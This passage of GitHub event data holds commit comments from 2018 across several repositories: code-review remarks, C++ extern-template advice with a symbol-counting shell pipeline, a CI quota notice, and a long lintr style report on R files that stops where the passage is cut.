{"id":"7944981929","type":"CommitCommentEvent","actor":{"login":"grischard"},"repo":{"name":"osmlab/editor-layer-index"},"payload":{"comment":{"id":29659694,"position":null,"line":null,"path":null,"commit_id":"036c9abac8987a35b272735023a9bf03f5528807","created_at":"2018-07-10T16:29:58Z","updated_at":"2018-07-10T16:29:58Z","author_association":"COLLABORATOR","body":"Can we have this as a polygon, not a multipolygon?"}},"created_at":"2018-07-10T16:29:58Z"}
{"id":"7944985179","type":"CommitCommentEvent","actor":{"login":"adrynnanisha"},"repo":{"name":"adrynnanisha/dataset"},"payload":{"comment":{"id":29659702,"position":null,"line":null,"path":null,"commit_id":"363be943c4ffdb5359e9c88aa97b5718f696c724","created_at":"2018-07-10T16:30:32Z","updated_at":"2018-07-10T16:30:32Z","author_association":"OWNER","body":"https://github.com/adrynnanisha/dataset/commit/363be943c4ffdb5359e9c88aa97b5718f696c724#diff-2c909c729be3c67483c6c38c5322508d"}},"created_at":"2018-07-10T16:30:32Z"}
{"id":"7944992751","type":"CommitCommentEvent","actor":{"login":"gir489"},"repo":{"name":"dude719/SigMaker-x64"},"payload":{"comment":{"id":29659720,"position":null,"line":null,"path":null,"commit_id":"65a84ce537280ebe48b4415427a82606bad1e0f4","created_at":"2018-07-10T16:31:49Z","updated_at":"2018-07-10T16:31:49Z","author_association":"COLLABORATOR","body":"Duplicate of 0b865583b2821e8ff394f2390969d9593ef01896?"}},"created_at":"2018-07-10T16:31:49Z"}
{"id":"7944994335","type":"CommitCommentEvent","actor":{"login":"billybonks"},"repo":{"name":"tradegecko/qunit-dom"},"payload":{"comment":{"id":29659722,"position":12,"line":312,"path":"lib/assertions.js","commit_id":"dab7bfb978480ea063248dbc050eac818e2eaddc","created_at":"2018-07-10T16:32:05Z","updated_at":"2018-07-10T16:32:05Z","author_association":"MEMBER","body":"@selvagsz why is camalized and not dasherized?"}},"created_at":"2018-07-10T16:32:05Z"}
{"id":"7944994532","type":"CommitCommentEvent","actor":{"login":"fredrikekre"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29659723,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T16:32:07Z","updated_at":"2018-07-10T16:32:07Z","author_association":"CONTRIBUTOR","body":"Yea I got that."}},"created_at":"2018-07-10T16:32:07Z"}
{"id":"7944995226","type":"CommitCommentEvent","actor":{"login":"TheBestPessimist"},"repo":{"name":"TheBestPessimist/AutoHotKey-Scripts"},"payload":{"comment":{"id":29659727,"position":null,"line":null,"path":null,"commit_id":"8a448b7a0e6123269a822102e50bf2ce10593e90","created_at":"2018-07-10T16:32:14Z","updated_at":"2018-07-10T16:32:14Z","author_association":"OWNER","body":"This commit has been mentioned on **Duplicacy Forum**. There might be relevant details there:\n\nhttp://forum.duplicacy.com/t/to-be-deleted-herpa-derpa-github-linkback/978/1\n"}},"created_at":"2018-07-10T16:32:14Z"}
{"id":"7944999351","type":"CommitCommentEvent","actor":{"login":"Toflar"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29659736,"position":13,"line":951,"path":"src/Resources/contao/drivers/DC_Table.php","commit_id":"e45c20cc5c5b642ae0b17bc413275efc9836062e","created_at":"2018-07-10T16:32:55Z","updated_at":"2018-07-10T16:32:55Z","author_association":"MEMBER","body":"Well up until now if you had a field named 'headline', 'name', 'subject', 'title', 'question' or 'label', you got the `copy of` message. You don't get it anymore now."}},"created_at":"2018-07-10T16:32:55Z"}
{"id":"7945005507","type":"CommitCommentEvent","actor":{"login":"TheBestPessimist"},"repo":{"name":"TheBestPessimist/AutoHotKey-Scripts"},"payload":{"comment":{"id":29659750,"position":null,"line":null,"path":null,"commit_id":"8a448b7a0e6123269a822102e50bf2ce10593e90","created_at":"2018-07-10T16:34:05Z","updated_at":"2018-07-10T16:34:05Z","author_association":"OWNER","body":"This commit has been mentioned on **Duplicacy Forum**. There might be relevant details there:\n\nhttp://forum.duplicacy.com/t/to-be-deleted-herpa-derpa-github-linkback/978/5\n"}},"created_at":"2018-07-10T16:34:05Z"}
{"id":"7945005970","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29659751,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T16:34:10Z","updated_at":"2018-07-10T16:34:10Z","author_association":"CONTRIBUTOR","body":"Hrmm, yea now that I look at it again, you're defining specializations., not explicit instantiations.\r\n\r\nWhat I was trying to communicate is that when you define a template type in a header file.\r\n\r\ne.g.\r\ntemplate<typename TYPE_T>\r\nstruct foo{.......};\r\n\r\nEach cpp file that includes that header file and uses any instantiation of the type in question will do code-gen for that instantiation.\r\n\r\nSo for a given shared library or exe, each .o file that gets created that uses that type has a copy of the resulting machine-code for the type, as a \"weak\" symbol. Then the compile-time linker gets invoked to merge all the .o files into the dll or exe, and the linker throws away all but one of each weak symbol it finds.\r\n\r\nFurther, if you're using a header file from a *different* shared library, you do the same thing, but instead of the compile time linker throwing away all instances of the weak symbols but one for the whole program, you're actually keeping a copy in your current binary object even though at runtime you'll link with a dll that has the \"canonical\" version of the symbol. \r\n\r\nThat results in your compilation process potentially being much slower than it otherwise would need to be, since you're generating a lot of extra machine code that you're just going to throw away in the next step (or which won't be thrown away, but doesn't need to exist since the dll that has the header file would have a copy already).\r\n\r\nSo what you can do about this is use the \"extern\" template keyword.\r\n\r\nIn your headerfile you have\r\n\r\ntemplate<typename TYPE_T> struct foo{....};\r\n\r\nand then ALSO\r\n\r\nextern template struct *dll export macro here* foo<int>;\r\n\r\nand then in your cpp file, you explicitly instantiate the template\r\n\r\n\"template struct foo<int>* // note, no dll export macro\r\n\r\nThe \"extern\" version of this in the header file is a promise to other code \"Hey! I know you want to instantiate this template. But listen, I got this. I promise that by the time you get run as part of a program, there will be a version of this symbol for you. Really, it's ok. Don't even bother generating code for this\".\r\n\r\nAnd in that way, you can drastically reduce the amount of duplicated symbols in your programs.\r\n\r\n\r\n\r\nI was working on this bash script a couple of weeks ago to try to find out how many duplicates my codebase at work has, but i didn't finish it.\r\n\r\n`find path/to/where/your/shared/libs/live -name \"*l64d-18-4.[so|a]\" -exec gcc-nm --no-sort --demangle --defined-only \"{}\" + 2>/dev/null | grep -v -e \"^$\" -e \" [nwWr] \" -e \".o:\" -e \"[clone\" -e \"thunk\" -e \"vtable\" -e \"typeinfo\" -e \"__\" | cut -d$' ' -f 3- | sort | uniq -cd | sort -gr | head -n 60`\r\n\r\nThat script excludes the weak symbols, instead of identifying them, but you should be able to modify the grep line to do what you want."}},"created_at":"2018-07-10T16:34:10Z"}
{"id":"7945009508","type":"CommitCommentEvent","actor":{"login":"CerealBlue"},"repo":{"name":"CerealBlue/MaidSama"},"payload":{"comment":{"id":29659756,"position":41,"line":41,"path":"MaidSamaFunctions/Polls.py","commit_id":"33c445290c372fcedeb3bc5b42730c45f59f00b2","created_at":"2018-07-10T16:34:47Z","updated_at":"2018-07-10T16:34:47Z","author_association":"OWNER","body":"Included arguments to mimic terminal commands with options"}},"created_at":"2018-07-10T16:34:47Z"}
{"id":"7945010510","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29659759,"position":null,"line":null,"path":null,"commit_id":"5799b757f1c08e6ca19bd8cd90f0fc0e3c3487c3","created_at":"2018-07-10T16:34:57Z","updated_at":"2018-07-10T16:34:57Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `2d720006-845f-11e8-848c-bdd8218a3fa4`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T16:34:57Z"}
{"id":"7945012448","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29659761,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T16:35:19Z","updated_at":"2018-07-10T16:35:19Z","author_association":"CONTRIBUTOR","body":"All that being said, now that I look at the StringIDUtils class again, I did a full grep of the bsf codebase. It's only ever used in the cpp file.\r\n\r\nMight as well move the template declaration of it to the cpp file as well (Unless you know of a use that grep didn't turn up?). That'll make this whole discussion a non-event :-)."}},"created_at":"2018-07-10T16:35:19Z"}
{"id":"7945013612","type":"CommitCommentEvent","actor":{"login":"fredrikekre"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29659763,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T16:35:33Z","updated_at":"2018-07-10T16:35:33Z","author_association":"CONTRIBUTOR","body":"Hmm, do we need to flip the order of these two lines as well? https://github.com/JuliaLang/julia/blob/25f91ab3068b92ef28ac462b545908c2d4687c83/base/loading.jl#L1107-L1108\r\nCan't find `OldPkg` otherwise. Why is that even in there?"}},"created_at":"2018-07-10T16:35:33Z"}
{"id":"7945016200","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29659773,"position":null,"line":null,"path":null,"commit_id":"da7a63ac8ff997f0bf58f54ea8437aa3d27764f9","created_at":"2018-07-10T16:36:01Z","updated_at":"2018-07-10T16:36:01Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y 